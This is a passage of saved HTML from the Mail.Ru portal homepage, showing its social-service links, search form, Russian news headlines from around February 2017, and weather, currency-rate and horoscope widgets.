id="js-ok-title" href="http://ok.ru/?_erv=vszatwybdjnmnedtcwq" name="clb10990355" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(0, 119, 204);"><span class="social__title__link__text" style="font-size: 18px; line-height: 22px;">Одноклассники</span></a></div> <div id="js-ok-wrapper" class="social__content social__content_ok social__content_ok_empty" style="padding-left: 23px;"> <div class="w-social__content_ok w-social__content_ok_noauth" id="js-ok-noauth" style="display: block;"> <div class="social__description social__description_ok" style="display: block; margin-top: 0px; color: rgb(106, 106, 106); line-height: 17px; white-space: nowrap;"><a href="http://r.mail.ru/cln10342/ok.ru/?_erv=vyiettrfgrpgnedkwz" name="clb11069923" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Войти</a><span class="Apple-converted-space"> </span>или<span class="Apple-converted-space"> </span><a href="http://r.mail.ru/cln10343/ok.ru/dk?st.cmd=anonymMain&st.registration=on&_erv=vwdduzstwemgoeduc" name="clb11069923" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">зарегистрироваться</a></div> </div> </div> </div> <div class="social social_mra" style="position: relative; z-index: 3; margin-left: 11px; margin-top: 12px;"> <div class="social__title" style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;"><a href="http://agent.mail.ru/?banner_id=0&partnerid=1313" class="social__title__link" name="clb11952830" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(0, 119, 204);"><span class="social__title__link__text" style="font-size: 18px; line-height: 22px;">Агент Mail.Ru</span></a></div> <div class="social__content social__content_mra" style="padding-left: 23px;"> <div class="social__description" style="display: block; margin-top: -2px; color: rgb(106, 106, 106); line-height: 17px; white-space: nowrap;"><a href="http://agent.mail.ru/?banner_id=0&partnerid=1313" class="social__description__link social__description__link_mra social__gray-link social__gray-link__target" name="clb11952830" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(106, 106, 106);">друзья ждут тебя!</a></div> </div> </div> <div class="social social_cloud" style="position: relative; z-index: 3; margin-left: 11px; margin-top: 14px;"> <div class="social__title" style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;"><a class="social__title__link" href="http://new.amigo.mail.ru/?utm_source=main&utm_medium=bloc&utm_content=18" name="clb15122443" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(0, 119, 204);"><span class="social__title__link__text" style="font-size: 18px; line-height: 22px;">Амиго</span></a><a class="social__title__description social__gray-link social__gray-link__target" href="http://new.amigo.mail.ru/?utm_source=main&utm_medium=bloc&utm_content=18" name="15122443" target="_blank" style="margin: 0px 0px 0px 7px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; line-height: 17px; text-decoration: none; color: rgb(106, 106, 106);">безопасный браузер</a></div> </div> <div class="social social_market" style="position: relative; z-index: 3; margin-left: 11px; margin-top: 14px;"> <div class="social__title" style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;"><a class="social__title__link" href="http://torg.mail.ru/?utm_source=main_link&utm_medium=rb&utm_campaign=title" name="clb1716931" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(0, 119, 204);"><span class="social__title__link__text" style="font-size: 18px; line-height: 22px;">Товары</span></a><a class="social__title__description social__gray-link social__gray-link__target" href="http://torg.mail.ru/notebooks/?utm_source=main_link&utm_medium=rb&utm_campaign=836064&utm_content=notebooks&_1ld=2057987_0&_1lp=1" name="clb2609766" target="_blank" style="margin: 0px 0px 0px 7px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; line-height: 17px; text-decoration: none; color: rgb(106, 106, 106); display: inline;">— купить ноутбук</a></div> </div> </div> <div class="layout__content" style="display: block; margin-left: 307.188px;"> <div class="layout__content__inner" style="padding-left: 35px; overflow: hidden;"> <div class="search" style="position: relative; z-index: 100; padding-bottom: 13px; min-height: 56px;"> <div class="search__projects-list" id="search__projects-list" style="height: 24px; white-space: nowrap; font-size: 0px;"><span class="search__title"><a href="http://r.mail.ru/clb657253/go.mail.ru/?fm=1&test_id=317" data-search-href="http://r.mail.ru/clb657253/go.mail.ru/search?fm=1&test_id=317&q=" class="search__title__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 18px; transition: color 0.1s ease-out; line-height: 21px; text-decoration: none; color: rgb(0, 119, 204);">Поиск в интернете</a></span><span class="search__projects-list__item" style="margin-left: 12px;"><a href="http://r.mail.ru/clb657254/go.mail.ru/search_images?fr=mailru&fm=1&test_id=317" data-search-href="http://r.mail.ru/clb657254/go.mail.ru/search_images?fr=mailru&fm=1&test_id=317&q=" class="search__projects-list__item__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Картинки</a></span><span class="search__projects-list__item" style="margin-left: 12px;"><a href="http://r.mail.ru/clb657255/go.mail.ru/search_video?fr=mailru&fm=1&test_id=317" data-search-href="http://r.mail.ru/clb657255/go.mail.ru/search_video?fr=mailru&fm=1&test_id=317&q=" class="search__projects-list__item__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Видео</a></span><span class="search__projects-list__item" style="margin-left: 12px;"><a href="http://r.mail.ru/clb20714157/go.mail.ru/search_apps?fr=mailru&fm=1&test_id=317" data-search-href="http://r.mail.ru/clb20714157/go.mail.ru/search_apps?fr=mailru&fm=1&test_id=317&q=" class="search__projects-list__item__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Приложения</a></span><span class="search__projects-list__item" style="margin-left: 12px;"><a href="http://r.mail.ru/clb657259/otvet.mail.ru/?fr=mailru&fm=1&test_id=317" data-search-href="http://r.mail.ru/clb657259/go.mail.ru/otvet?fr=mailru&fm=1&test_id=317&q=" class="search__projects-list__item__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(0, 119, 204);">Ответы</a></span></div> <form class="search__form" action="https://go.mail.ru/search" method="get" accept-charset="UTF-8" id="search" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; width: 937.813px;"> <div class="search__form__layout"> <div class="search__form__layout__rightcol" style="float: right;"><span class="search__button" id="search__button" style="position: relative; display: block; width: 138px; border-radius: 2px; border: 1px solid rgb(233, 161, 75); background: rgb(255, 169, 48);"><span class="search__button__wrapper search__button__wrapper_outer" style="display: block; background-position: 0px -60px;"><span class="search__button__wrapper search__button__wrapper_inner" style="display: block; height: 29px; text-align: center;"><input value="Найти" tabindex="2" class="search__button__wrapper__field" id="search__button__wrapper__field" style="font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 18px; line-height: 28px; font-family: "Helvetica Neue", Arial, sans-serif; position: absolute; top: 0px; left: 0px; display: block; margin: 0px; padding: 0px 10px 2px; width: 138px; height: 29px; border: none; background: 0px 0px; color: rgb(255, 255, 255); text-align: center;" type="submit" /></span></span></span></div> <div class="search__form__layout__leftcol" style="position: relative; margin-right: 143px;"><label class="search__input" for="q" style="margin: 0px; padding: 0px; border: 1px solid rgb(161, 161, 161); vertical-align: baseline; font-size: 13px; display: block; cursor: text; background: rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.0980392) 2px 2px 7px -2px inset; border-radius: 2px;"><span class="search__input__wrapper" style="position: relative; display: block; padding-right: 20px; height: 29px;"><input autocomplete="off" tabindex="1" value="" class="search__input__wrapper__field" name="q" id="q" style="font-style: normal; font-variant: normal; font-weight: normal; font-stretch: normal; font-size: 18px; line-height: 23px; font-family: "Helvetica Neue", Arial, sans-serif; display: block; margin: 0px; padding: 3px 10px; width: 772.813px; height: 23px; background: rgb(255, 255, 255); color: rgb(34, 34, 34); -webkit-appearance: none; outline-color: rgb(77, 153, 218); border: 0px;" type="text" /></span></label></div> </div> </form> </div> <div class="layout__content__wrap"> <div id="l-center" class="layout__centercol" style="position: relative; float: left; padding-bottom: 34px; min-height: 493px; width: 937.813px;"> <div class="layout__centercol__wrap" style="margin-right: 335px;"> <div id="news" class="news" data-extspace="{"5072":1,"5092":1,"5360":1}" style="position: relative; margin-bottom: 2px;"> <div class="w-news__tabs" style="margin-right: 0px; position: relative;"> <table class="news__tabs" style="margin: 0px 0px 7px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; border-spacing: 0px; border-collapse: collapse; width: 603px;"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <td id="news__tabs_firstlane" data-c="d660506" data-n="main" class="news__tabs__item news__tabs__item_selected" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border-width: 0px 1px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; width: 99px; text-align: center;"><a class="news__tabs__item__link news__tabs__item__link_first" href="https://news.mail.ru/" name="clb644113" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 0px; border-style: solid; border-color: rgb(208, 208, 208) rgb(208, 208, 208) rgb(255, 255, 255); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(255, 255, 255); text-decoration: none; color: rgb(0, 119, 204);">Новости</a></td> <td class="news__tabs__item" data-c="d660372" data-n="sport" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border-width: 0px 1px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; width: 85px; text-align: center;"><a class="news__tabs__item__link" name="clb644062" href="https://sport.mail.ru/" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 0px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(240, 240, 240); text-decoration: none; color: rgb(34, 34, 34);">Спорт</a></td> <td class="news__tabs__item" data-c="d660373" data-n="auto" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border-width: 0px 1px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; width: 78px; text-align: center;"><a href="https://auto.mail.ru/" class="news__tabs__item__link" name="clb644114" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 0px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(240, 240, 240); text-decoration: none; color: rgb(34, 34, 34);">Авто</a></td> <td data-c="d660375" data-n="afisha" class="news__tabs__item" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border-width: 0px 1px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; width: 78px; text-align: center;"><a href="https://afisha.mail.ru/" class="news__tabs__item__link" name="clb644116" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 0px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(240, 240, 240); text-decoration: none; color: rgb(34, 34, 34);">Кино</a></td> <td class="news__tabs__item news__tabs__item_double" data-c="d660379" data-n="lady" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border-width: 0px 1px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; width: 81px; text-align: center; display: table-cell;"><a href="https://lady.mail.ru/" class="news__tabs__item__link" name="clb644064" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 0px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(240, 240, 240); text-decoration: none; color: rgb(34, 34, 34);">Леди</a></td> <td class="news__tabs__item news__tabs__item_double" data-c="d683644" data-n="games" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border-width: 0px 1px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; width: 80px; text-align: center; display: table-cell;"><a href="http://games.mail.ru/pc/" class="news__tabs__item__link" name="clb683645" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 0px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(240, 240, 240); text-decoration: none; color: rgb(34, 34, 34);">Игры</a></td> <td class="news__tabs__item news__tabs__item_double" data-c="d660380" data-n="hitech" style="margin: 0px; padding: 0px; vertical-align: top; font-size: 13px; border: 0px; width: 95px; text-align: center; display: table-cell;"><a href="https://hi-tech.mail.ru/" class="news__tabs__item__link" name="clb644118" target="_blank" style="margin: 0px; padding: 0px 10px; border-width: 1px 1px 1px 0px; border-style: solid; border-color: rgb(208, 208, 208); border-image: initial; vertical-align: baseline; font-size: 13px; transition: none; position: relative; z-index: 8; display: block; height: 23px; line-height: 23px; white-space: nowrap; cursor: pointer; background: rgb(240, 240, 240); text-decoration: none; color: rgb(34, 34, 34);">Hi-Tech</a></td> </tr> </tbody> </table> </div> <div id="news__wrap" class="news__wrap" style="position: relative; overflow: hidden; height: 266px; margin-left: -8px;"> <div class="news__list news__list_active" style="position: absolute; top: 0px; left: 0px; z-index: 1; visibility: visible; width: 610.813px;"> <div id="news:main" class="news__list__slot"> <div id="news:main:container" class="news__list__group" style="position: relative; z-index: 1;"> <div id="news:main:list" data-s="2939" data-b="632085"> <div id="news:item:28630580" data-updatable="true" data-value="28630580" class="news__list__item news__list__item_main" style="position: relative; padding: 3px 5px 5px; line-height: 16px; white-space: normal; margin-bottom: 3px; margin-left: 3px;"> <div class="news__list__item__wrap" style="height: 65px; overflow: hidden;"><a name="n246102029sz0" href="https://news.mail.ru/politics/28630580/?frommail=1" class="news__list__item__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(124, 164, 204);"><img src="https://r.mradx.net/pictures/5F/085423.jpg" class="news__list__item__link__image" alt="" style="margin: 2px 12px 0px 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; float: left;" width="112" height="63" /></a><a name="n246102029sz0" href="https://news.mail.ru/politics/28630580/?frommail=1" class="news__list__item__link" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">В ЧФ опровергли утверждения Киева об обстреле самолета Ан-26</span></a><a name="n246102029sz0" href="https://news.mail.ru/politics/28630580/?frommail=1" class="news__list__item__description" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: block; text-decoration: none; color: rgb(34, 34, 34);">Минобороны Украины заявило, что украинский транспортный самолет ВМС Ан-26 был обстрелян из стрелкового оружия якобы с буровых вышек РФ в Черном море</a></div> </div> <div id="news:item:28631596" data-updatable="true" data-value="28631596" class="news__list__item news__list__item_simple" style="position: relative; padding: 1px 0px 1px 3px; line-height: 19px; white-space: nowrap; display: block; margin: 0px; width: auto; height: auto;"><a name="n246108187sz0" href="https://news.mail.ru/economics/28631596/?frommail=1" class="news__list__item__link news__list__item__link_simple" target="_blank" style="margin: 0px; padding: 0px 5px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">В РЖД предложили запретить курение электронных сигарет в поездах</span></a></div> <div id="news:item:28630891" data-updatable="true" data-value="28630891" class="news__list__item news__list__item_simple" style="position: relative; padding: 1px 0px 1px 3px; line-height: 19px; white-space: nowrap; display: block; margin: 0px; width: auto; height: auto;"><a name="n246103331sz0" href="https://news.mail.ru/politics/28630891/?frommail=1" class="news__list__item__link news__list__item__link_simple" target="_blank" style="margin: 0px; padding: 0px 5px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">Россия установила пограничную зону на границе с Белоруссией</span></a></div> <div id="news:item:28631375" data-updatable="true" data-value="28631375" class="news__list__item news__list__item_simple" style="position: relative; padding: 1px 0px 1px 3px; line-height: 19px; white-space: nowrap; display: block; margin: 0px; width: auto; height: auto;"><a name="n246107654sz0" href="https://news.mail.ru/politics/28631375/?frommail=1" class="news__list__item__link news__list__item__link_simple" target="_blank" style="margin: 0px; padding: 0px 5px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">Посольство РФ объяснило отказ во въезде норвежским депутатам</span></a></div> <div id="news:item:28627111" data-updatable="true" data-value="28627111" class="news__list__item news__list__item_simple" style="position: relative; padding: 1px 0px 1px 3px; line-height: 19px; white-space: nowrap; display: block; margin: 0px; width: auto; height: auto;"><a name="n246085903sz0" href="https://news.mail.ru/society/28627111/?frommail=1" class="news__list__item__link news__list__item__link_simple" target="_blank" style="margin: 0px; padding: 0px 5px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">В свет вышли стихи Лаврова про обезьяну и петуха</span></a></div> <div id="news:item:28631211" data-updatable="true" data-value="28631211" class="news__list__item news__list__item_simple" style="position: relative; padding: 1px 0px 1px 3px; line-height: 19px; white-space: nowrap; display: block; margin: 0px; width: auto; height: auto;"><a name="n246104859sz0" href="https://news.mail.ru/incident/28631211/?frommail=1" class="news__list__item__link news__list__item__link_simple" target="_blank" style="margin: 0px; padding: 0px 5px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">Истребители ВВС США на учениях ошибочно открыли огонь по военным</span></a></div> <div id="news:item:28625591" data-updatable="true" data-value="28625591" class="news__list__item news__list__item_simple news__list__item_hiddable_prepreprelast" style="position: relative; padding: 1px 0px 1px 3px; line-height: 19px; white-space: nowrap; display: block; margin: 0px; width: auto; height: auto;"><a name="n246080777sz0" href="https://news.mail.ru/incident/28625591/?frommail=1" class="news__list__item__link news__list__item__link_simple" target="_blank" style="margin: 0px; padding: 0px 5px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline-block; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">Арестованных офицеров ФСБ обвинили в госизмене</span></a></div> </div> </div> <div id="news:main:extend" class="w-news__list__item_project news__list__group" style="position: relative; z-index: 1;"> <div class="news__list__item" data-d="20234139" style="position: relative; padding: 1px 0px 1px 8px; line-height: 19px; white-space: nowrap;"><a name="clb20234139sz0" class="news__list__item__info" href="https://lady.mail.ru/" target="_blank" style="margin: 0px 7px 0px 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline; text-decoration: none; color: rgb(106, 106, 106);">Леди</a><a name="clb20234139sz0" href="https://lady.mail.ru/article/494002-jeks-vozljublennaja-telegina-vyskazalas-o-ego-romane-s-pelageej/" target="_blank" class="news__list__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">Бывшая жена Телегина высказалась о его романе с Пелагеей</span></a></div> <div class="news__list__item" data-d="1375316" style="position: relative; padding: 1px 0px 1px 8px; line-height: 19px; white-space: nowrap;"><a name="clb1375316sz0" class="news__list__item__info" href="https://auto.mail.ru/" target="_blank" style="margin: 0px 7px 0px 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline; text-decoration: none; color: rgb(106, 106, 106);">Авто</a><a name="clb1375316sz0" href="https://auto.mail.ru/article/63718-v_kazahstane_za_257_000_prodayut_zil_raisy_gorbachevoi/" target="_blank" class="news__list__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">ЗИЛ Раисы Горбачёвой продают за 257 тысяч долларов</span></a></div> <div class="news__list__item" data-d="20998583" style="position: relative; padding: 1px 0px 1px 8px; line-height: 19px; white-space: nowrap;"><a name="clb20998583sz0" class="news__list__item__info" href="https://afisha.mail.ru/" target="_blank" style="margin: 0px 7px 0px 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: inline; text-decoration: none; color: rgb(106, 106, 106);">Кино</a><a name="clb20998583sz0" href="https://afisha.mail.ru/tvshow/news/48154/?from=mr_news" target="_blank" class="news__list__item__link" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; text-decoration: none; color: rgb(124, 164, 204);"><span class="news__list__item__link__text" style="position: relative;">Экс-участница «Дома 2» станет домработницей в новом реалити-шоу</span></a></div> </div> </div> </div> </div> </div> <div id="slot_4847" class="tgb" style="height: 60px; border: 1px solid rgb(240, 240, 240); margin-top: 4px; position: relative;"><a href="https://r.mail.ru/n245592048?sz=&test_id=317&rnd=530170516" class="tgb__inner" data-b="25106325" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; display: table; box-sizing: border-box; width: 600px; height: 60px; text-decoration: none; color: rgb(0, 119, 204);"><span class="tgb__inner__figure" style="display: table-cell; width: 90px; height: 60px; min-width: 90px; overflow: hidden; vertical-align: middle; text-align: center;"><img class="tgb__inner__figure__img" src="https://r.mradx.net/img/00/E70216.jpg" alt="Фильмы года" style="margin: 0px; padding: 0px; vertical-align: middle; font-size: 13px; border: 0px; max-height: 60px;" /></span><span class="tgb__inner__content" style="display: table-cell; width: 480px; vertical-align: middle; padding: 0px 15px;"><span class="tgb__inner__content__inner" style="display: block; max-height: 50px; overflow: hidden;"><span class="tgb__inner__content__title">Фильмы года</span><span class="tgb__inner__content__text" style="display: block; color: rgb(34, 34, 34);">Номинанты «Оскар 2017»</span></span></span></a></div> <div class="regional-info clearfix" style="margin-top: 13px;"> <div class="regional-info__title" style="float: left; white-space: nowrap;"><span class="regional-info__cityselection" style="display: inline-block; font-size: 12px; position: relative;"><a class="regional-info__cityselection__link" id="regional-info-link-0" href="https://mail.ru/region" name="clb1221590" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 12px; transition: color 0.1s ease-out; display: block; text-decoration: none; cursor: pointer; color: rgb(34, 34, 34);"><span class="regional-info__cityselection__link__text" style="display: block; font-size: 16px; line-height: 18px; border-bottom: 1px dotted rgb(167, 170, 178); transition: border-color 0.1s ease-out;">Абуджа</span></a></span><span class="Apple-converted-space"> </span><span class="regional-info__date" style="display: inline-block; margin-left: 5px; font-size: 13px; line-height: 18px; color: rgb(106, 106, 106);"><span class="regional-info__date__day" id="regionalInfoDay">среда</span>,<span class="Apple-converted-space"> </span><span class="regional-info__date__month" id="regionalInfoMonth">1 февраля</span>,<span class="Apple-converted-space"> </span><span class="regional-info__date__time" id="regionalInfoTime">19:40</span></span></div> </div> <table class="informers informers_first" style="margin: 8px 0px 0px; padding: 0px; vertical-align: baseline; font-size: 13px; border: 0px; border-spacing: 0px; border-collapse: collapse; width: 602px; table-layout: fixed; height: 61px;" cellspacing="0"> <tbody style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <tr style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px;"> <td id="weather" class="informers__column informers__column_left" style="margin: 0px; padding: 16px 10px 0px 0px; vertical-align: middle; font-size: 13px; border: 0px; position: relative; width: 189px;"> <div id="weather:inner" class="informers__column__inner" data-s="3031" data-b="1265489" style="overflow: hidden;"><a name="clb1283812" href="https://pogoda.mail.ru/" class="informers__title" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 14px; transition: color 0.1s ease-out; text-decoration: none; white-space: nowrap; line-height: 16px; color: rgb(0, 119, 204); position: absolute; top: 0px; left: 0px; right: 10px; overflow: hidden;"><span class="informers__title__text" style="position: relative; display: inline-block;">Погода</span></a><a id="weather:link" class="weather clearfix" name="clb1283825" target="_blank" href="https://pogoda.mail.ru/prognoz/abuja/" title="переменная облачность" style="margin: 6px 0px 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; position: relative; display: block; cursor: pointer; text-decoration: none; color: rgb(0, 119, 204);"><span class="w-weather" style="display: block; margin-left: 45px; white-space: nowrap;"><span id="weather:item:now_temp" class="weather__temperature quotations__item__hider" data-value="+32" style="display: inline-block; margin-top: -3px; font-size: 18px; line-height: 1; white-space: nowrap; color: rgb(34, 34, 34); transition: opacity 0.15s ease;">+32</span><span id="weather:item:near" class="weather__forecast weather__forecast_near quotations__item__hider" data-value="+221" style="font-size: 13px; color: rgb(34, 34, 34); white-space: nowrap; display: inline; transition: opacity 0.15s ease;">, ночью +22</span></span><span class="w-weather" style="display: block; margin-left: 45px; white-space: nowrap;"><span id="weather:item:tomorrow_temp" class="weather__forecast weather__forecast_tomorrow quotations__item__hider" data-value="+35" style="font-size: 13px; color: rgb(34, 34, 34); white-space: nowrap; transition: opacity 0.15s ease;">завтра +35</span></span></a></div> </td> <td id="currency" class="informers__column informers__column_center" style="margin: 0px; padding: 16px 5px 0px; vertical-align: middle; font-size: 13px; border: 0px; position: relative; width: 153px;"> <div class="informers__column__inner" id="currency:inner" data-s="2827" data-b="644327" style="overflow: hidden;"><a name="clb1716933" href="https://news.mail.ru/currency.html" class="informers__title" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 14px; transition: color 0.1s ease-out; text-decoration: none; white-space: nowrap; line-height: 16px; color: rgb(0, 119, 204); position: absolute; top: 0px; left: 5px; right: 5px; overflow: hidden;">Торги ММВБ</a> <div class="quotations"> <div id="currency:usd" class="w-quotations__item" style="height: 16px; overflow: hidden;"><a class="quotations__item quotations__item_link" title="Курс сделок по данным ММВБ" href="https://news.mail.ru/currency.html?charcode=USD" name="clb644327" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(34, 34, 34);"><span class="quotations__item__type" style="margin-right: 4px;"><span class="quotations__item__type__symbol" style="display: inline-block; min-width: 9px; font-size: 12px; line-height: 1; text-align: center;">$</span></span><span id="currency:item:usd" data-updatable="true" data-value="60.21" class="quotations__item__hider" style="transition: opacity 0.15s ease;"><span class="quotations__item__rate">60.21</span><span class="quotations__item__increment quotations__item__increment_plus" style="padding-left: 4px; color: green; font-size: 11px;">+0.05</span></span></a></div> <div id="currency:eur" class="w-quotations__item" style="height: 16px; overflow: hidden;"><a class="quotations__item quotations__item_link" title="Курс сделок по данным ММВБ" href="https://news.mail.ru/currency.html?charcode=EUR" name="clb644327" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 13px; transition: color 0.1s ease-out; white-space: nowrap; text-decoration: none; color: rgb(34, 34, 34);"><span class="quotations__item__type" style="margin-right: 4px;"><span class="quotations__item__type__symbol" style="display: inline-block; min-width: 9px; font-size: 12px; line-height: 1; text-align: center;">€</span></span><span id="currency:item:eur" data-updatable="true" data-value="64.72" class="quotations__item__hider" style="transition: opacity 0.15s ease;"><span class="quotations__item__rate">64.72</span><span class="quotations__item__increment quotations__item__increment_minus" style="padding-left: 4px; color: rgb(222, 74, 74); font-size: 11px;">−0.19</span></span></a></div> </div> </div> </td> <td class="informers__column informers__column_right" style="margin: 0px; padding: 16px 0px 0px 10px; vertical-align: middle; font-size: 13px; border: 0px; position: relative; width: 230px;"> <div class="informers__column__inner" style="overflow: hidden;"><a name="clb1753709" href="https://horo.mail.ru/" class="informers__title" target="_blank" style="margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-size: 14px; transition: color 0.1s ease-out; text-decoration: none; white-space: nowrap; line-height: 16px; color: rgb(0, 119, 204); position: absolute; top: 0px; left: 10px; right: 0px; overflow: hidden;"><span class="informers__title__text" style="position: relative; display: inline-block;">Гороскопы</span></a> <div class="horoscope" style="height: 32px; overflow: hidden; display: block;"> <div class="horoscope__forecast"><a 